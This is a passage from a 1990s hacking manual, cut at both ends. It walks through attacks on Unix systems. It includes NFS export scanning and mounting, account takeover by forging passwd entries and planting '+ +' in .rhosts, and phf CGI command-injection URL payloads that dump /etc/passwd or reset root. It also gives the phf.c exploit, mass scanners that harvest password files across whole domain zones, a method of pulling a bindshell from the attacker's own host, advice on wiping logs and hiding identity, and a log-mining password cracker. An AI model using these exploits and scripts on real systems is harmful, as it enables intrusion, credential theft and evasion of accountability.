  1444. mount the remote drive and gain access you will need to modify the system's
  1445. password file and use the su command.
  1446.  
  1447. Ok let's say we have root access. let's get started!
  1448.  
  1449. You can see if another system has mountable drives by using the showmount
  1450. command.
  1451.  
  1452. From root account:
  1453.  
  1454. $root> showmount -e wwa.com
  1455. mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
  1456.  
  1457. Ok, no problem, this domain will not work, go on to the next one...
  1458.  
  1459. $root> showmount -e seva.net
  1460. Export list for seva.net:
  1461. /var/mail                                        pluto.seva.net
  1462. /home/user1                                      pluto.seva.net
  1463. /usr/local                                       pluto.seva.net,rover.seva.net
  1464. /export/X11R6.3                                  rover.seva.net
  1465. /export/rover                                    rover.seva.net,pluto.seva.net
  1466. /export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
  1467.  
  1468. Notice the (everyone), this would be good if we wanted to install linux
  1469. from this guy's box, but we want open directories to users.... so go on to
  1470. the next one...
  1471.  
  1472. $root> showmount -e XXXXX.XXX < this one worked ... find your own ;)
  1473. Export list for XXXXX.XXX:
  1474. /export/home (everyone)
  1475.  
  1476. Now this guy mounted his home directory, the user accounts are off of the home
  1477. directory ;) and look above ... (everyone) can access it!
  1478.  
  1479.  
  1480. Ok, this section was to show you how to see if they are mountable, in the next
  1481. section i will show you how to mount and hack it.  But for now, here is a
  1482. script that will scan for EVERY DOMAIN on the internet that is mountable and
  1483. log them for you.
  1484.  
  1485. To use this script simply use the domain ripper in the PHF section and download
  1486. the needed files from rs.internic.net rip some domains and name the file
  1487. 'domains' and startup the script.  To make it run in the background put a
  1488. & after the command.  like this: cmount.pl&
  1489.  
  1490. How it works:
  1491.  
  1492. When you run the file it will go to the domains list and run showmount -e
  1493. on each domain, if it finds that there is a return on mountable drives
  1494. it will save the info in the current directory in files named:
  1495. domain.XXX.export.  All you have to do is view the files and mount the drives!
  1496.  
  1497. --------------- start of cmount.pl
  1498. #!/usr/bin/perl -w
  1499. #
  1500. # Check NFS exports of hosts listed in file.
  1501. # (Hosts are listed, once per line with no additional whitespaces.)
  1502. #
  1503. # ii@dormroom.pyro.net - 2/27/97.
  1504.  
  1505. # Assign null list to @URLs which will be added to later.
  1506. my(@result) = ();
  1507. my(@domains) = ();
  1508. my($program) = "showmount -e ";
  1509.  
  1510. # Pull off filename from commandline. If it isn't defined, then assign default.
  1511. my($DomainFilename) = shift;
  1512. $DomainFilename = "domains" if !defined($DomainFilename);
  1513.  
  1514. # Do checking on input.
  1515. die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename);
  1516.  
  1517. # Open $DomainFilename.
  1518. open(DOMAINFILE, $DomainFilename) or 
  1519.   die("mountDomains: Cannot open $DomainFilename for input.\n");
  1520.   
  1521. while (<DOMAINFILE>) {
  1522.   chomp($_);
  1523.   print "Now checking: $_";
  1524.  
  1525.   # Note difference in program output capture from "geturl.pl".  
  1526.   open (EXECFILE, "$program $_ |");
  1527.   @execResult = <EXECFILE>;
  1528.   next if (!defined($execResult[0]));
  1529.   if ($execResult[0] =~ /^Export/) {
  1530.     print " - Export list saved.";
  1531.     open (OUTFILE, ">$_.export");
  1532.     foreach (@execResult) {
  1533.       print OUTFILE;
  1534.     }
  1535.     close (OUTFILE);
  1536.   }
  1537.   close(EXECFILE);
  1538.   print "\n";
  1539. }
  1540.   
  1541. # We are done. Close all files and end the program.
  1542. close (DOMAINFILE);
  1543.  
  1544. 0;
  1545. ----------------- end of cmount.pl
  1546.  
  1547. Ok, now on to mounting the drives ....
  1548.  
  1549. lets say we did a showmount -e domain.com and got back:
  1550.  
  1551. Export list for domain.com:
  1552. /   (everyone)
  1553. /p1 (everyone)
  1554. /p2 (everyone)
  1555. /p3 (everyone)
  1556. /p5 (everyone)
  1557. /p6 (everyone)
  1558. /p7 (everyone)
  1559. /var/spool/mail titan,europa,galifrey
  1560. /tmp            (everyone)
  1561.  
  1562. We would want to mount /  .. yup .... this guy has his entire system mountable!
  1563.  
  1564. $root> mkdir /tmp/mount
  1565. $root> mount -nt nfs domain.com:/ /tmp/mount
  1566.  
  1567. If he had the home directory mountable the command would be:
  1568.  
  1569. $root> mount -nt nfs domain.com:/home /tmp/mount
  1570.  
  1571. To unmount the system, make sure you are out of the directory and type:
  1572. $root> umount /tmp/mount
  1573.  
  1574. Make sure you make the mount directory first, you can make this anywhere on the
  1575. system that you want.  If the systems /mnt directory is empty you can use it
  1576. also.
  1577.  
  1578. Ok this is for real:
  1579.  
  1580. bash# ls -al /mnt  ; making sure the mnt dir is empty
  1581. ls: /mnt: No such file or directory ; there was not even a dir there ;)
  1582. bash# mkdir /mnt ; lets make one for them <g>rin
  1583. bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
  1584. bash# cd /mnt ; changing to the mounted drive...
  1585. bash# ls ; just the plain dir ..
  1586. TT_DB             home              raddb             share
  1587. back              local             radius-961029.gz  www
  1588. exec              lost+found        radius-961029.ps
  1589. bash# ; there is is up there, the home dir ... oh good ...
  1590. bash# cd home
  1591. bash# ls -l  ; long directory listing ... tom is looking good here ;)
  1592. total 18
  1593. drwxr-xr-x   2 judy     other         512 Feb  1 10:41 garry
  1594. drwxr-xr-x  69 infobahn other        5632 Mar 10 01:42 horke
  1595. drwxr-xr-x  11 301      other        2048 Mar  1 10:25 jens
  1596. drwxr-xr-x   2 300      other         512 Oct 15 07:45 joerg
  1597. drwxr-xr-x   2 604      other         512 Feb  8 13:00 mailadmin
  1598. drwxr-xr-x   2 melissa  other         512 Sep 27 06:15 mk
  1599. drwxr-xr-x   6 news     news          512 Mar  6  1996 news
  1600. drwxr-xr-x   2 303      other         512 Jan 24 04:17 norbert
  1601. drwxr-xr-x   4 jim      other         512 Sep 27 06:16 pauk
  1602. drwxr-xr-x   2 302      other         512 Mar  1 10:10 tom
  1603. drwxr-xr-x   5 601      daemon        512 Jan 26  1996 viewx
  1604. drwxr-xr-x  10 15       audio         512 Oct 17 08:03 www
  1605. bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file
  1606. bash# pico /etc/passwd
  1607. tom:x:302:2::/home:/bin/bash ; this should do it ;)
  1608. bash# su - tom ; su to the tom account ...
  1609. bash$ ls -l
  1610. total 18
  1611. drwxr-xr-x   2 judy     other         512 Feb  1 10:41 garry
  1612. drwxr-xr-x  69 infobahn other        5632 Mar 10 01:42 horke
  1613. drwxr-xr-x  11 301      other        2048 Mar  1 10:25 jens
  1614. drwxr-xr-x   2 300      other         512 Oct 15 07:45 joerg
  1615. drwxr-xr-x   2 604      other         512 Feb  8 13:00 mailadmin
  1616. drwxr-xr-x   2 melissa  other         512 Sep 27 06:15 mk
  1617. drwxr-xr-x   6 news     news          512 Mar  6  1996 news
  1618. drwxr-xr-x   2 303      other         512 Jan 24 04:17 norbert
  1619. drwxr-xr-x   4 jim      other         512 Sep 27 06:16 pauk
  1620. drwxr-xr-x   2 tom      other         512 Mar  1 10:10 tom
  1621. drwxr-xr-x   5 601      daemon        512 Jan 26  1996 view
  1622. drwxr-xr-x  10 15       audio         512 Oct 17 08:03 www
  1623. bash$ ; NOTICE above that toms user number is gone ... we now own his dir!
  1624. bash$ echo + +>>tom/.rhosts  ; this will make a file in his dir called .rhosts
  1625. bash$ ;inside .rhosts will be wild cards + +  for anyone to rlogin to his account
  1626. bash$ rlogin xxxxx.xxx  we are tom on our machine, so lets just rlogin plain.
  1627. Last login: Fri Mar  7 00:16:03 from xxxxx.xxxxxxxxxx
  1628. Sun Microsystems Inc.   SunOS 5.5       Generic November 1995
  1629. >  ; yup we are in!
  1630. > ls -al
  1631. total 8
  1632. drwxr-xr-x   2 tom      group        512 Mar  1 17:10 .
  1633. drwxr-xr-x  14 tom      group        512 Jan 24 11:16 ..
  1634. -rw-r--r--   1 tom      group        144 Dec 30 15:32 .profile
  1635. -rw-r--r--   1 tom      bin            8 Mar 11 08:26 .rhosts
  1636. >
  1637.  
  1638. So now we have access, so lets just hack this system ... oops, that is another
  1639. lesson!  Have pun!
  1640.  
  1641. ---------------------
  1642. Chapter III
  1643. Getting passwd files
  1644. ---------------------
  1645.  
  1646. Here are some ways to get password files from unix systems.  Most of them
  1647. you will need an account, but there is still a way to access to the system
  1648. without having an account.  Here you will learn the difference between a
  1649. regular passwd file and a shadowed passwd file.  You will also learn a way
  1650. to read the shadowed password file.
  1651.  
  1652. ------------------
  1653. Section 3A
  1654. PHF WWW PH Query
  1655. ------------------
  1656.  
  1657. There is a program in the WWW cgi-bin directory called phf, if the file
  1658. is there, and has permission x, you can access it by using the www, or
  1659. a text version browser in linux called lynx.  Now you can read files on the
  1660. system (yup .. /etc/passwd) and save them to files local in your computer.
  1661.  
  1662. There are many things we can get done here.  If the server is running their
  1663. httpd server as root owner, we can be root by using phf and even change an
  1664. account password on the machine.
  1665.  
  1666. I will include a perl script here that will auto check all of the systems out
  1667. there by using the getdomain.pl script above and check what the server is
  1668. running under.  If it is running under root, it will just log the id, if the
  1669. server is not running under root, it will auto get the passwd file from the
  1670. /etc directory and name it domainname.???.passwd.
  1671.  
  1672. I will also attach a script that will allow you to use a simple command from
  1673. a shell and if phf is on the system allow you to pipe commands from the shell
  1674. to the remote system with one command line.
  1675.  
  1676. Ok now that you know what is coming, lets teach you how to use phf.
  1677.  
  1678. Use your favorite web browser, or the text version in unix called most of
  1679. the time lynx, on some systems www.
  1680.  
  1681. After the screen comes up type the letter g, now a line appears like below:
  1682.  
  1683. URL to open:
  1684.   Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  1685.   H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
  1686.  
  1687. You type:
  1688.  
  1689. URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
  1690.   Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  1691.   H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
  1692.  
  1693. It returns:
  1694.  
  1695.                                  QUERY RESULTS
  1696.  
  1697.  
  1698.  
  1699.    /usr/local/bin/ph -m alias=x id
  1700.  
  1701. uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
  1702.  
  1703.  
  1704. So here we see it is running under a user (nobody), so we can be a user named
  1705. nobody on this system.  We are not root, but this will have to do ;)
  1706.  
  1707. Notice the command line:
  1708.  
  1709. http://afp.org/cgi-bin/phf/?Qalias=x%0aid
  1710.  
  1711. The id was the command to the server to give us the id of the user.  Some times
  1712. you will have to give the full path to the file you want to run, in this case
  1713. it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id
  1714.  
  1715. Notice that after the %0a you start your command line.  If you need to enter
  1716. a space you would put a %20 instead of the space.  Here would be some sample
  1717. command lines. I will start them with %0a
  1718.  
  1719. Cat the passwd file
  1720. %0a/bin/cat%20/etc/passwd
  1721.  
  1722. Get a long directory of the /etc directory of all files starting with pass
  1723. %0als%20-al%20/etc/pass*
  1724.  
  1725. backup the passwd file if you have root access to httpd to passwd.my
  1726. %0acp%20/etc/passwd%20/etc/passwd.my
  1727.  
  1728. Change the root passwd (if the server will let you (most times it works)
  1729. %0apasswd%20root
  1730.  
  1731. (the above should let you login without a password, make sure to copy the
  1732. passwd.my file over the passwd file right away, and then delete the backup,
  1733. then make yourself an suid bash shell somewhere and rename it, sniff to get
  1734. your passwords)
  1735.  
  1736. If you know how to type commands in unix and don't forget that you need to
  1737. use %20 in the place of spaces, you will not have any problems!
  1738.  
  1739. Ok lets cat the passwd file on this box ;)
  1740.  
  1741. URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd
  1742.  
  1743. We get:
  1744.  
  1745.  
  1746.                                  QUERY RESULTS
  1747.  
  1748.  
  1749.  
  1750.    /usr/local/bin/ph -m alias=x cat /etc/passwd
  1751.  
  1752. root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
  1753. bin:*:1:1:bin:/bin:
  1754. daemon:*:2:2:daemon:/sbin:
  1755. adm:*:3:4:adm:/var/adm:
  1756. lp:*:4:7:lp:/var/spool/lpd:
  1757. sync:*:5:0:sync:/sbin:/bin/sync
  1758. shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
  1759. halt:*:7:0:halt:/sbin:/sbin/halt
  1760. mail:*:8:12:mail:/var/spool/mail:
  1761. news:*:9:13:news:/usr/lib/news:
  1762. uucp:*:10:14:uucp:/var/spool/uucppublic:
  1763. operator:*:11:0:operator:/root:/bin/bash
  1764. games:*:12:100:games:/usr/games:
  1765. man:*:13:15:man:/usr/man:
  1766. postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
  1767. nobody:*:-2:100:nobody:/dev/null:
  1768. ftp:*:404:1::/home/ftp:/bin/bash
  1769. guest:*:405:100:guest:/dev/null:/dev/null
  1770. bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
  1771. web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
  1772. mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
  1773.  
  1774. A small passwd file <g>rin
  1775.  
  1776. If you want to save this to a file in your local directory, just choose the
  1777. print option in the text browser and you will get an option to save the file
  1778. in your home directory.
  1779.  
  1780. Lets learn something here:
  1781.  
  1782. mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
  1783. 1   :2            :3  :4  :5             :6         :7
  1784.  
  1785. 1=username 2=encrypted password 3=user number 4=groop id 5=real name
  1786. 6=home directory 7=shell
  1787.  
  1788. Ok, lets say you do not want to keep using the WWW browser, here is a script
  1789. you can compile to just type regular commands from your shell.
  1790.  
  1791. phf.c
  1792. ------ cut here----
  1793.  
  1794. /* Some small changes for efficiency by snocrash. */
  1795. /*
  1796.  * cgi-bin phf exploit by loxsmith [xf]
  1797.  *
  1798.  * I wrote this in C because not every system is going to have lynx.  Also,
  1799.  * this saves the time it usually takes to remember the syntatical format
  1800.  * of the exploit.  Because of the host lookup mess, this will take
  1801.  * approximately 12 seconds to execute with average network load.  Be patient.
  1802.  *
  1803.  */
  1804.  
  1805. #include <stdio.h>
  1806. #include <string.h>
  1807. #include <sys/types.h>
  1808. #include <sys/socket.h>
  1809. #include <netinet/in.h>
  1810. #include <netdb.h>
  1811. #include <errno.h>
  1812.  
  1813. int main(argc, argv)
  1814.      int argc;
  1815.      char **argv;
  1816. {
  1817.      int i = 0, s, port, bytes = 128;
  1818.      char exploit[0xff], buffer[128], hostname[256], *command, j[2];
  1819.      struct sockaddr_in sin;
  1820.      struct hostent *he;
  1821.  
  1822.      if (argc != 3 && argc != 4) {
  1823.           fprintf(stderr, "Usage: %s command hostname [port]", argv[0]);
  1824.           exit(1);
  1825.      }
  1826.  
  1827.      command = (char *)malloc(strlen(argv[1]) * 2);
  1828.  
  1829.      while (argv[1][i] != '\0') {
  1830.           if (argv[1][i] == 32) strcat(command, "%20"); else {
  1831.                sprintf(j, "%c", argv[1][i]);
  1832.                strcat(command, j);
  1833.           }
  1834.           ++i;
  1835.      }
  1836.  
  1837.      strcpy(hostname, argv[2]);
  1838.      if (argc == 4) port = atoi(argv[3]); else port = 80;
  1839.  
  1840.      if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) {
  1841.           he = gethostbyname(hostname);
  1842.       if (he) {
  1843.                sin.sin_family = he->h_addrtype;
  1844.                memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0], 
  1845.                       he->h_length);
  1846.           } else {
  1847.                fprintf(stderr, "%s: unknown host %s\n", argv[0], hostname);
  1848.                exit(1);
  1849.           }
  1850.      }
  1851.      sin.sin_family = AF_INET;
  1852.      sin.sin_port = htons((u_short) port);
  1853.  
  1854.      if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
  1855.           fprintf(stderr, "%s: could not get socket\n", argv[0]);
  1856.           exit(1);
  1857.      }
  1858.  
  1859.      if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
  1860.           close(s);
  1861.           fprintf(stderr, "%s: could not establish connection\n", argv[0]);
  1862.           exit(1);
  1863.      }
  1864.  
  1865.      sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s\n", command);
  1866.      free(command);
  1867.      write(s, exploit, strlen(exploit));
  1868.      while(bytes == 128) {
  1869.           bytes = read(s, buffer, 128);
  1870.           fprintf(stdout, buffer);
  1871.      }
  1872.      close(s);
  1873. }
  1874.  
  1875. -------- cut here
  1876.  
  1877. Here is how you use it:
  1878.  
  1879. bash% phf id xxx.org
  1880.  
  1881. ------
  1882. <H1>Query Results</H1>
  1883. <P>
  1884. /usr/local/bin/ph -m  alias=X
  1885. id
  1886. <PRE>
  1887. uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
  1888. </GET /cgi-bin/phf/?Qalias=X%0aid
  1889. ------
  1890.  
  1891. The above was our response, remember to use the %codes after your command.
  1892. To cat the password file using this program you would type:
  1893.  
  1894. phf cat%20/etc/passwd hostname.xxx
  1895.  
  1896. Yet Another way to use phf was written by Quantumg on his web page, this is
  1897. new and just thought of, so I was sure to add this right into this manual
  1898. for you.
  1899.  
  1900. Here is the text:
  1901.  
  1902.  
  1903. New QG Phf Attack MO
  1904. --------------------
  1905.  
  1906. yerp.. I know it's a long time since phf has been considered a viable
  1907. attack but you'd be surprised just how many stupid linux operators there
  1908. are out there..
  1909.  
  1910. first.. a little background.
  1911.  
  1912. Phf is a cgi-bin executable found on apache web servers.  It is sploitable
  1913. and the result is you can execute commands on the web server as whoever
  1914. they're running httpd as, usually nobody but sometimes as root.  To sploit
  1915. it is simply a matter of connecting to the web server and giving the
  1916. query:
  1917.  
  1918.      GET /cgi-bin/phf/?Qalias=X%0a
  1919.  
  1920. followed by the command you wish to execute with %20 used for spaces.  You
  1921. can do no piping, quotes, shell replacements, etc.
  1922.  
  1923. ok.. so on with the attack.  What we are going to do is go and look for a
  1924. linux box (I usually telnet to the box to see the issue.net) which has the
  1925. phf bug.  I, like a whole lot of other people, use the program phf 
  1926. loxsmith to exploit the phf bug.  All it does is connect to the host
  1927. specified in argv[2] and dump the query with argv[1] as the command.  It
  1928. is used as such:
  1929.  
  1930.     phf id www.host.to.hack
  1931.  
  1932. where id is the command you want to execute.  This is the first thing I'd
  1933. do.  Not only does it tell me if the box is sploitable, it also tells me
  1934. what they are running httpd as.  So, assuming we get back a nice response,
  1935. we have a box to hack.  The first problem is getting stuff onto the box to
  1936. execute.  It's not much of a problem.  You can 1 check for writable ftp
  1937. directory's or 2, and my personal favorite, use rcp.  To use rcp you need
  1938. to set up a few things on your machine (or better yet, a machine that you
  1939. hacked earlier).  The first of these things is an account that you can use
  1940. for the transfer.  Select something simple and unmemoriable.  I use the
  1941. username "test".  Next you need to put the name of the host you are
  1942. hacking (www.host.to.hack) in your /etc/hosts.equiv.  Then you need to
  1943. make sure you have a "shell" line in your /etc/inetd.conf and that you
  1944. have restarted inetd to read this line.  Finally you need to create a
  1945. .rhosts file in the test's homedir that has the name of the host you're
  1946. hacking followed by the username that httpd is running as.
  1947.  
  1948. /etc/hosts.equiv:
  1949. www.host.to.hack
  1950.  
  1951. /etc/inetd.conf:
  1952. shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd -L
  1953.  
  1954. ~test/.rhosts:
  1955. www.host.to.hack nobody
  1956.  
  1957. ok.. so once you have all that set up you can get things onto the remote
  1958. host. 
  1959.  
  1960. What I used to do was transfer little hacks across that had been heavily
  1961. modified to work whilst being executed by phf.  It was not a pleasant
  1962. affair, nor very effective.  Now we have a solution.  What we send across
  1963. is a modified in.telnetd.  It has been modified to start up in "debug"
  1964. mode which makes it bind to a port (9999) and execute /bin/sh instead of
  1965. /bin/login.  It also forks before executing the shell which means it will
  1966. sit on port 9999 and accept as many connections as you want.  
  1967.  
  1968. So, to get this onto the remote host, all we have to do is put it in
  1969. test's homedir (make sure it's readable) and do:
  1970.  
  1971.      phf 'rcp test@my.ip.address:bindwarez /tmp' www.host.to.hack
  1972.  
  1973. in your local logs you will see a connection attempt to in.rshd and the
  1974. command it executes (something like 'rcp -f bindwarez').. after the phf
  1975. finishes bindwarez will be in the /tmp on the remote machine.  You can now
  1976. execute it and telnet to port 9999.  
  1977.  
  1978. If the web site was stupid enough to be running httpd as root you will now
  1979. want to secure it by installing an in.telnetd trojan and cleaning up the
  1980. logs.  However, more likely, you will only have a nobody shell and have to
  1981. hack root with some other sploit.  I usually find this no problem because
  1982. the admin has taken it as granted that no-one will ever have a shell on
  1983. their www box and thus there's no need to secure it - which they're
  1984. obviously not very good at if they still have sploitable phf.  
  1985.  
  1986. I cant stress the importance of cleaning out the logs tho.  Your address,
  1987. the one in the rcp command you sent, is right there for the admin to see.
  1988. They dont even have to dig.  These logs are usually in
  1989. /usr/local/etc/httpd/logs and sometimes in /var/lib/httpd/logs.  The best
  1990. way to find it is to try these locations and then, if you still don't find
  1991. it, do: find / -name cgi-bin.  That'll do it.  Also don't forget to kill
  1992. the bindwarez processes and remove the /tmp/bindwarez.  
  1993.  
  1994. This is a really kewl attack.. it solves a lot of problems which makes phf
  1995. so annoying.  
  1996.  
  1997. L8s
  1998.  
  1999. QuantumG
  2000.  
  2001.  
  2002. Another way to use phf would be to use the perl script a few scripts above
  2003. called getdomain.pl to rip host names out of the domain files on
  2004. rs.internic.net, after this is done you can 'probe' every domain on the net
  2005. using geturl.pl.
  2006.  
  2007. Here is the script:
  2008.  
  2009. geturl.pl
  2010. --------- cut here
  2011.  
  2012. #!/usr/bin/perl -w
  2013. #
  2014. # geturl by Nfin8 / Invisible Evil
  2015. # Questions to: /msg i-e  or  /msg i^e
  2016. #
  2017. # Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/usr/bin/id
  2018. # Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  2019. # IF result of first command returns an "id=" then check for user. If user
  2020. # is not root then execute the 2nd form.
  2021.  
  2022. # Assign null list to @URLs which will be added to later.
  2023. my(@URLs)=();
  2024. my($program) = "lynx -dump";
  2025.  
  2026. # Pull off filename from commandline. If it isn't defined, then assign default.
  2027. my($URLfilename) = shift;
  2028. $URLfilename = "urls" if !defined($URLfilename);
  2029.  
  2030. # Do checking on input.
  2031. die("GetURL: $URLfilename is a directory.\n") if (-d $URLfilename);
  2032.  
  2033. # Open and read contents of URL file into @URL by line.
  2034. open(FILE, $URLfilename) or die("GetURL: Cannot open $URLfilename for input.\n");
  2035. @URLs = <FILE>;
  2036. close(FILE);
  2037.  
  2038. # Open output file.
  2039. open(OUTFILE, ">>GetURLResults") or die("GetURL: Cannot open output file.\n");
  2040.  
  2041. my($url)="";
  2042. foreach $url (@URLs) {
  2043.   print ("Now checking: $url");
  2044.   chomp($url);
  2045.   $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id`;
  2046.   print OUTFILE ("\n============ $url ============\n");
  2047.   foreach (split(/\n/, $result)) {
  2048.     print OUTFILE ("$_\n");
  2049.   }
  2050.   if ($result =~ m/id=/i) {
  2051.     if ($result =~ m/root/i) {
  2052.       print ("Logging root response.\n");
  2053.     } else {
  2054.       print ("Got ID response, getting /etc/passwd...");
  2055.       $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd`;
  2056.       
  2057.       # Output results to file named <domain>.passwd;
  2058.       local($domainfilename)="";
  2059.       $domainfilename = $url;
  2060.       if (open(PASSWDFILE, ">${domainfilename}.passwd")) {
  2061.         print PASSWDFILE ("\n");
  2062.         foreach (split(/\n/, $result)) {
  2063.           print PASSWDFILE ("$_\n");
  2064.         }
  2065.         close(PASSWDFILE);
  2066.         print ("Done! [$domainfilename].\n");
  2067.       } else {
  2068.         print ("FAILED! [$domainfilename].\n");
  2069.       }
  2070.     }
  2071.   }
  2072. }
  2073.   
  2074. # We are done. Close the output file and end the program.
  2075. close (OUTFILE);
  2076.  
  2077.  
  2078. 0;
  2079. 
  2080. ------------- cut here
  2081.  
  2082. Ok this is easy, if you name your domain file urls, you are all set to go.
  2083. Just type geturl.pl after chmod +x on the file.
  2084.  
  2085. Here are my doc's for the file:
  2086.  
  2087. This handy tool is easy to use and will get you some root access and
  2088. many passwd files from different domains.
  2089.  
  2090. geturl.pl will try and log results for every domain on the internet.  You
  2091. choose the type: .COM .EDU .ORG .MIL .GOV  (OR) you can supply a list of
  2092. IP addresses to  be checked.  If  finds a root access account it
  2093. will simply log uid=root in the result file and go on to the next domain.
  2094. If PHF Probe finds non-root access it will snag the passwd file for you and
  2095. save it in the current directory in the (domainname.???.passwd) format.
  2096.  
  2097. Here are the short doc's and how it works.  Any questions /msg i-e or i^e
  2098.  
  2099. ftp to ftp.rs.internic.net
  2100.  
  2101. in the domain directory you will find:
  2102.  
  2103. com.zone.gz
  2104. edu.zone.gz
  2105. gov.zone.gz
  2106. mil.zone.gz
  2107. net.zone.gz
  2108. org.zone.gz
  2109.  
  2110. download these files and run getdomain.pl on the domains you want to target
  2111. first, in this manor:  "perl getdomain.pl com.zone com >com.all"
  2112.  
  2113. What this will do is rip all of the .COM domains and put them into a file
  2114. called com.all.
  2115.  
  2116. If you wanted to do all of the .EDU addresses you would type:
  2117.  
  2118. perl getdomain.pl edu.zone edu >edu.all
  2119.  
  2120. Now you will have a list to use with (geturl.pl) called edu.all
  2121.  
  2122. To use this list just type:
  2123.  
  2124. geturl.pl <filename>
  2125.  
  2126. filename=edu.all or com.all  and leave out the <>'s
  2127. if you name your domain file 'urls' it does not require <filename>
  2128.  
  2129. results will log into a file name of: GetURLResults in the current directory.
  2130.  
  2131. 1. geturl.pl will search using lynx (make sure it is in your path)
  2132.  
  2133. 2. if geturl finds it has root access to httpd on a url it will just log
  2134.    root for that domain in the result file.  If geturl finds it is not root,
  2135.    but still has access to the domain using phf it will snatch the domain
  2136.    passwd file and save it in the current directory under fulldomainname.passwd
  2137.  
  2138. 3. if you like you can just give a list of ip addresses in the feed file
  2139.  
  2140. 4. i use os/2 with lynx and perl ported to the hpfs so i have no problems
  2141.    with the long file names.  i have tested it under unix and it works good
  2142.    so you should have no problems running this in a unix shell.
  2143.  
  2144. What you need:
  2145.  
  2146. 1. Perl in the path
  2147. 2. Lynx in the path
  2148. 3. 256 char filenames ie: (unix or os/2 hpfs)
  2149. 4. The files included here
  2150. 5. Internic's domain files from their ftp or just make your own list or
  2151.    urls or IP's and name the file 'urls' and type: geturl.pl
  2152.  
  2153. Caution:
  2154.  
  2155. It would be best if you paid cash for an internet account in your area under
  2156. another name or used a hacked account to get all of your results, then used
  2157. another safe account to start your work on the results.  BUT I don't need to
  2158. tell you this right?  I take no blame for these files, they are provided for
  2159. you to use to check security on domains ;)
  2160.  
  2161.  
  2162.  getdomain.pl: to rip .ORG .COM .EDU .MIL .GOV Internic domain files
  2163.     geturl.pl: to check and log the results of each domain
  2164. GetURLResults: The file that geturl makes as its log file
  2165.  
  2166. Here is one more thought:
  2167.  
  2168. If you can read the /var/adm/messages file you can get some user passwords
  2169. out of there lotz of times!  I have even got ROOT passwords from there!
  2170.  
  2171. Wow many times have you been in a hurry to login?  You type the password
  2172. at the Login:  his is easy to do on one of those days that nothing seems to
  2173. be going right.  You failed the login twice, the system is running slow, and it
  2174. just happens!
  2175.  
  2176. Login: you hit enter
  2177. Password: you think this is wanting the login name so you type your name
  2178. Login: you type your password
  2179.  
  2180. In the messages file it looks like this:
  2181.  
  2182. Login: yourpassword
  2183. Password ****** They don't give it, only the login name, but ooops, you
  2184. typed your password, and if we have access to read the messages file,
  2185. we have a good password to put in crackerjack and run it.  If on a small
  2186. system, no prob ... lets hope it's root ;)
  2187.  
  2188. Here is a script to make things easy!
  2189.  
  2190.  
  2191. FOR QUANTUM'S BINDWAREZ FILE: You will find it at the end of this paper
  2192. in the appendix uuencoded.
  2193.  
  2194. ------------ cut here
  2195.  
  2196. #!/bin/sh
  2197. # Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
  2198. # /var/log/messages is world readable. If a user types in his password at
  2199. # the login prompt, it may get logged to /var/log/messages.
  2200. #
  2201. # I could swear this topic has been beaten to death, but I still see this
  2202. # problem on every linux box I have access to.
  2203. #
  2204. # Dave G.
  2205. # 12/06/96
  2206. # <daveg@escape.com>
  2207. # http://www.escape.com/~daveg
  2208.  
  2209. echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$
  2210.  
  2211. grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$
  2212.  
  2213. if [ ! -e ./scrack ]
  2214. then
  2215.    echo "Creating scrack.c"
  2216.    cat << ! > scrack.c
  2217. #include <stdio.h>
  2218. #include <unistd.h>
  2219. #include <pwd.h>
  2220. #include <sys/types.h>
  2221. #define get_salt( d, s ) strncpy( d, s, 2 )
  2222. void
  2223. main(argc,argv)
  2224. int argc;
  2225. char **argv;
  2226. {
  2227.    struct passwd *pwd;
  2228.    FILE *fp;
  2229.    char buff[80], salt[3], *encrypted_string;
  2230.  
  2231.    if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
  2232.    {
  2233.       fprintf( stderr, "Couldnt find dict file\n" );
  2234.       exit(1);
  2235.    }
  2236.    while ( fgets( buff, 80, fp ) != NULL )
  2237.    {
  2238.       setpwent();
  2239.       buff[strlen(buff)-1]='\0';
  2240.       while ( ( pwd = getpwent() ) != NULL )
  2241.       {
  2242.         if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
  2243.            ( strlen( (*pwd).pw_passwd ) == 13 ) )
  2244.         {
  2245.            get_salt(salt, (*pwd).pw_passwd );
  2246.  
  2247.            encrypted_string = crypt( buff, salt );
  2248.            if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
  2249.            {
